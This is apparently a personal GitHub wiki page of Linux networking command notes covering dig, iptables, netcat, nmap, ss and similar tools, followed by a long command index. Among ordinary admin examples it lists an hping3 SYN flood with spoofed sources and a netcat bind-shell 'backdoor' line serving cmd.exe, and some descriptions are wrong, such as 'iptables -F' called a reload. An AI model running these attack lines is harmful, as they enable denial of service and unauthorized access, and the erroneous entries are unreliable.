Network - jasper-zanjani/dotfiles GitHub Wiki

Network

bmon

[ref][https://www.networkworld.com/video/99387/how-to-use-the-bmon-command-2-minute-linux-tips] [ref][https://www.networkworld.com/article/3447936/viewing-network-bandwidth-usage-with-bmon.html]

dig

DNS lookup tool that returns the text of the actual response from the DNS server, useful when troubleshooting a DNS issue (cf. nslookup )
Nameserver

dig example.com NS

Mail server

dig example.com MX

Perform a reverse DNS lookup on an IP address

dig -x 8.8.8.8

Specify an alternate DNS server to query

dig @8.8.8.8 example.com

Find authoritative nameservers for the zone and display SOA records

dig +nsearch example.com

Lookup the IP associated with a domain name

dig +short example.com

Lookup the mail server IP associated with a domain name

dig +short example.com MX example.com MX

Perform iterative queries and display the entire trace path to resolve a domain name

dig +trace example.com

Get all types of records for a given domain name

dig example.com ANY

Display Start of Authority information for a domain

dig example.com soa

firewall-cmd

add-port add-service get-active-zones get-default-zone get-services list-services new-zone permanent reload remove-service state

Successor to iptables in Red Hat, and like its predecessor a frontend to the netfilter protocols. Places network traffic into zones. Commands have to be written twice: once to affect running config and again to have the change saved

Configuration file Description
/etc/sysconfig/network-scripts/ifcfg-ens33 interface settings
/usr/lib/firewalld/services .xml files that define services ("ZONE=public")

Add a new zone, and write the change to disk

firewall-cmd --new-zone=testlab  --permanent

hping3

Hping3 crafts "SYN" (sequence) packets from random spoofed IP addresses and sends them out at very short intervals. [Sec+ Lab][Sec+ Lab]

Option POSIX option Effect [ref][https://tools.kali.org/information-gathering/hping3]
-i --interval wait for specified number of microseconds
-p --destport destination port
-q --quiet quiet
-S --baseport base source port (default random)
  --rand-source random source address mode 
hping3 192.168.0.2 -p 80 -i u10 -S -q --rand-source

ifconfig

"RX" and "TX" stand for received and transmitted.

Apply a static IP address to interface {eth0} and turn it on ("up")

ifconfig eth0 up 10.1.230.245 netmask 255.255.255.0

Bring an interface up or down

ifup eth0
ifdown eth0

ifconfig eth0 up
ifconfig eth0 down

Display details of all interfaces (even disabled)

ifconfig -a

Disable eth0

ifconfig eth0 down

Configure eth0 with an additional IPv6 address

ifconfig eth0 inet6 add fdd6:551:b09e::/128

Enable eth0

ifconfig eth0 up

Turn network interface {eth0} on or off using ifconfig

ifconfig eth0 up
ifconfig eth0 down

Turn off network interface {eth0}

ifdown eth0

Bring online all interfaces marked as auto within the networking configuration

ifup -a

Turn on network interface {eth0}

ifup eth0

ip

Newer alternative to the old ifconfig

ip addr

Show L2 status (links)

ip link

Listen for netlink messages

ip monitor

Display routing information

ip route

Change the default gateway to 192.168.1.1 on eth0

ip route change default via 192.168.1.1 dev eth0

Turn on interface wlp2s0

sudo ip link set wlp2s0 up

iptables

A popular firewall, like firewalld, a frontend for the kernel-level netfilters service. Interface configuration, used to assign a TCP/IP configuration to a network interface, but no longer installed on modern distros.

Config files Description
/etc/sysconfig/iptables location of saved config

Display rules as written on disk

iptables --list-rules

Accept SSH traffic from a particular IP

iptables -A INPUT -p ssh -s 10.0.222.222 -j ACCEPT

Accept incoming TCP traffic to port 80

iptables -A INPUT -p tcp --dport 80 -j ACCEPT

Reload configuration file

iptables -F

Show statistics for configuration lines

iptables -vnL --lines

Display rules as written on disk

iptables --list-rules

Set an iptable rule to accept SSH traffic from a particular IP

iptables -A INPUT -p ssh -s 10.0.222.222 -j ACCEPT

Set an iptable rule to accept incoming TCP traffic to port 80

iptables -A INPUT -p tcp --dport 80 -j ACCEPT

Reload configuration file

iptables -F

Show statistics for configuration lines

iptables -vnL --lines

iptables-save

iw

Show or manipulate wireless devices and their configuration; followed by dev, phy, or reg depending on the device.

Check the name of network device Fedora Docs

iw dev

Check the connecdtion status of the Wi-Fi device wlp2s0

iw wlp2s0 link

iwlist

nc

The netcat utility allows testing of a host's ports, similar to ping, but more versatile because ping only uses the portless ICMP protocol. GNU and OpenBSD versions available (itp-l+: 28)

Option Effect
-l listening mode

Connect to host on port 80

nc example.com 80

Scan ports

# Scan a single port
nc -v -w 2 z 192.168.56.1 22

# Scan multiple ports
nc -v -w 2 z 192.168.56.1 22 80

# Scan a range of ports
nc -v -w 2 z 192.168.56.1 22-25

Transfer files between servers This example uses the pv utility to monitor progress.

# Run `nc` in listening mode (`-l` option) on port 3000
tar -zcf - debian-10.0.0-amd64-xfce-CD-1.iso | pv | nc -l -p 3000 -q 5

# On the receiving client, to obtain the file:
nc 192.168.1.4 3000 | pv | tar -zxf -

Create a command-line chat server

# Create chat server listening on port 5000
nc -l -vv -p 5000

# Launch a chat session on the other system
nc 192.168.56.1 5000

Find a service running on port Obtain port banners (-n disables DNS lookup)

nc -v -n 192.168.56.110 80

Create stream sockets Create and listen on a UNIX-domain stream socket

nc -lU /var/tmp/mysocket &
ss -lpn | grep "/var/tmp/"

Create a backdoor Netcat needs to listen on a chosen port (here 3001): -d disables reading from stdin; -e specifies the command to run on the target system

nc -L -p 3001 -d -e cmd.exe

Connect to {port} at {host}

nc host port

Netcat command that retrieves a webpage

nc host port \get

netstat

  a   c       g   i     l   n o p   r s t u v        
                          M                          

Show network traffic

netstat -an

Refresh every five seconds

netstat -c5

Show the current default route without performing DNS lookups on the IP addresses involved

netstat -rn

Count number of TCP connections

netstat -a | grep tcp - | wc -l

Active sessions

netstat -tp

All sessions

netstat -atp

Routing table with name resolution

netstat -rn

Get the list of IPs and ports that are connected via https on your webserver every second

watch -n 1 'netstat -an | grep ":443"'

Get the total number of connections on port 80 every second

watch -n 1 'netstat -an | grep ":80" | wc -l'

nmcli

Control NetworkManager and report network status

Display devices and statuses

nmcli device status

Display information on interfaces as well as status Including other network connections not managed by network manager ("unmanaged") or not connected ("unavailable")

nmcli dev status

Display what connections are enabled

nmcli general status

Display UUIDs associated with network connections

nmcli connection show --active

Display much more information on network devices

nmcli device show

Configure settings for network interface {ens01} via interactive shell

nmcli connection edit ens01

List all connections NetworkManager has

nmcli connection show

Show settings for network interface {ens01}

nmcli device show ens01

Show status for all devices

nmcli device status

Display devices and status

nmcli device status

Display currently configured hostname

nmcli general hostname

Set hostname to {hostname}

nmcli general hostname hostname

Show overall status of NetworkManager

nmcli general status

nmap

Scan hosts and ports on a network
Scan hosts from a text file

nmap -iL hosts.txt

Identify a host's operating system

nmap -A localhost.example.com

Determine whether a host has a firewall enabled

nmap -sA localhost.example.com

Scan a specified range of ports

nmap -p 10-300 localhost.example.com

Perform a SYN TCP scan, stealthier than the TCP connect scan

nmap -sT localhost.example.com

Aggressive scan

nmap -A 192.168.1.0/24

Ping scan home network (not bothering with ports)

nmap -sn 192.168.1.0/24

Fast port scan using SYN packets

nmap -sS -F 192.168.1.0/24

Port scan using SYN ("synchronize") packet, first element of TCP handshake

nmap -sS 192.168.1.0/24

Port scan using normal TCP

nmap -sT 192.168.1.0/24

Port scan using UDP

nmap -sU 192.168.1.0/24

Xmas scan

nmap -sX

Scan a range of IPs [ref][Sec+ Lab]

nmap 192.168.27.0/24 > hosts.txt

Identify operating system and scan ports using TCP SYN packets [ref][Sec+ Lab]

nmap -O -sS 192.168.27.0/24 > hosts.txt

nslookup

Perform a DNS lookup in an interactive shell with cleaner output than dig. Enter a domain name and you get output in two sections. Retrieve IP address of {host}

nslookup host

Get IP address of a website

nslookup url

Get only nameservers

nslookup -type=ns url

Get only MX records

nslookup -type=mx url

Get Start of Authority (SOA) record

nslookup -type=soa url

Display all available records

nslookup -type=any url

Perform reverse DNS lookup on {ipaddress}

nslookup ipaddress

Specify port {portno} in the lookup

nslookup -port=portno url

rfkill

block list unblock

Tool for enabling and disabling wireless devices

Unblock Bluetooth, if it is blocked [ref][https://computingforgeeks.com/connect-to-bluetooth-device-from-linux-terminal/]

rfkill unblock bluetooth

route

                h           n               v        
      C     F                                        

ss

  a                     l               t u     x    

Options are of two kinds:

  1. Connection type (listening or established)
  2. Protocol type

Display port numbers instead of protocol names

ss -n

ss --numeric

Do name lookups and display all information

ss -an

Display all active TCP sessions

ss -atp

Display active TCP sessions

ss -tp

Display routing table (cf. ip route)

ss --route

Display programs with open ports

ss --program

Show all running servers "Tuna please"

ss -tunapl

Do name lookups and display all information

ss -an
ss --all --numeric

Display all sessions, filtering to just TCP that are actively listening

ss -atp
ss --all --tcp --processes

Display active TCP connections

ss -tp
ss --tcp --processes

sysctl

Disable

sysctl -w net.ipv6.conf.all.disable_ipv6=1
sysctl -w net.ipv6.conf.default.disable_ipv6=1

Re-enable IPv6 networking

sysctl -w net.ipv6.conf.all.disable_ipv6=0
sysctl -w net.ipv6.conf.default.disable_ipv6=0

tcpdump

Inspect actual IP packets

All network data will be displayed to STDOUT

tcpdump -i eth0

Set snapshot length of capture (default 65,535B)

tcpdump -s

traceroute

            f     i         n         s t   v w      
                                        T            

ufw

Allow traffic associated with SSH, HTTP, and HTTP

ufw allow ssh
ufw allow http
ufw allow htts

Distributions Alpine Arch CentOS Clear CoreOS Fedora GNOME KDE Kali Mac OS X WSL Yocto Archive ar bzcat bzip2 bzless bzmore compress cpio dar gunzip gzcat gzip tar uncompress unxz unzip xz zcat zip zipcloak zipcmp zipdetails zipgrep zipinfo zipnote zipsplit
Audio alsamixer amixer speaker-test

bash bg bind break builtin caller case/esac cd command compgen complete compopt continue declare dirs disown do/done echo enable eval exec exit export false fc fg for function getopts hash help history if/fi jobs kill let local logout mapfile popd printf pushd pwd read readarray readonly return select set shift shopt source suspend test time times trap true type typeset ulimit umask unalias unset until wait while

Build tools aclocal as autoconf autoheader automake autoreconf autoscan autoupdate bison cc ctags etags flex g++ gcc gcore gdb gprof ldd lex make xgettext yacc

Boot grub-install grub-mkconfig grub2-editenv update-grublilo Shell environment apropos env export history man nohup pwd sleep su sudo tee tmux unalias watch whatis where whereis which xargs File commands chattr chgrp chmod chown cksum cp curl dd dirname dos2unix exif fallocate file find getfacl install link ln locate ls lsattr lsof md5sum mkdir mktemp mv rename rm rmdir rsync scp setfacl setuid stat touch tree umask unlink updatedb whereis which Filters awk cat cmp comm csplit cut diff3 diff ed egrep ex expand fgrep fmt gettext grep groff head join less look more nl od paste pr sed shuf sort split tac tail tee tr unexpand uniq wc Hardware settings bluetoothctl insmod lsmod lspci lsusb modprobe rmmod Information ausearch bpftrace df du free glances hwclock loadaverage logger logrotate lsb_release man mpstat nproc ntpdate printenv rsyslogd sar sysbench syslogd time timedatectl tty uname uptime vmstat Init SystemD hostnamectl journalctl localectl loginctl systemctl systemd-delta timedatectl Sysvinit chkconfig init runlevel service telinit Upstart initctl Kernel dbus-monitor depmod dmesg dracut insmod journalctl ldconfig lsmod mkinitrd modinfo modprobe rmmod udevadm Mail biff mail mailmerge mailq mailx makemap msmtp newaliases newaliases postalias postfix postqueue qmail sendmail SMTP servers exim postfix qmail sendmail Network bmon brctl curl dig ethtool firewall-cmd host hping3 ifconfig iftop ifup-wireless ip iperf ipset iscsiadm iw iwconfig iwlist kinit klist mtr netcat netplan netstat nmap nmblookup nmcli nmtui nslookup ping rfkill route sftp ss ssh ssh-add ssh-agent ssh-keygen ssh-keyscan stty tcpdump tracepath tracepath6 traceroute tshark ufw wget whois xinetd Package managers add-apt-repository alien apt apt-cache apt-get apt-key brew dnf dpkg dpkg-reconfigure dselect galliumos-repodist gem pacman pip pydoc rpm snap yay yum yumdownloader zypper Process control at atq atrm bg fg jobs kill killall lsns nice nohup pgrep pidof pkill ps pstree renice strace top unshare Remote administration curl ftp rsync ssh ssh-add ssh-agent ssh-keygen ssh-keyscan stty telnet vncpasswd vncviewer sshfs [SELinux][SELinux] chcon getenforce getsebool restorecon semanage sestatus setenforce setsebool System administration adduser chage chgrp chmod date edquota gpasswd groupadd groupdel groupmod groups last lastb passwd quota quotacheck quotaoff quotaon repquota su sudo sudoedit timedatectl tzconfig tzselect ulimit useradd userdel usermod visudo w wall who whoami Utilities git tig X windows system cvt x xdpyinfo xfs xhost xlsclients xmodmap xorg xrandr xset xwininfo

⚠️ **GitHub.com Fallback** ⚠️